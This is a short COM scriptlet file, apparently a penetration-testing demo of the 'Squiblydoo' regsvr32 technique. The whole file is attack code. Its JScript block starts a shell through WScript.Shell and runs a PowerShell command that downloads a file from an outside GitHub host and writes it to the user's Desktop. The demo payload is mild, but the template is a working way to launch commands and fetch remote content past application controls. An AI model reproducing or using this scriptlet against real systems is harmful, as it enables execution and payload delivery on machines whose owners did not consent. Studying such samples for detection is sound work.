<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("powershell -command Invoke-WebRequest -Uri https://raw.githubusercontent.com/matt-threatlocker/squiblydoodemo/master/badFile.txt -OutFile (join-path ([environment]::GetFolderPath('Desktop')) 'test.txt')"); 
]]>
 
</script>
</registration>
</scriptlet>
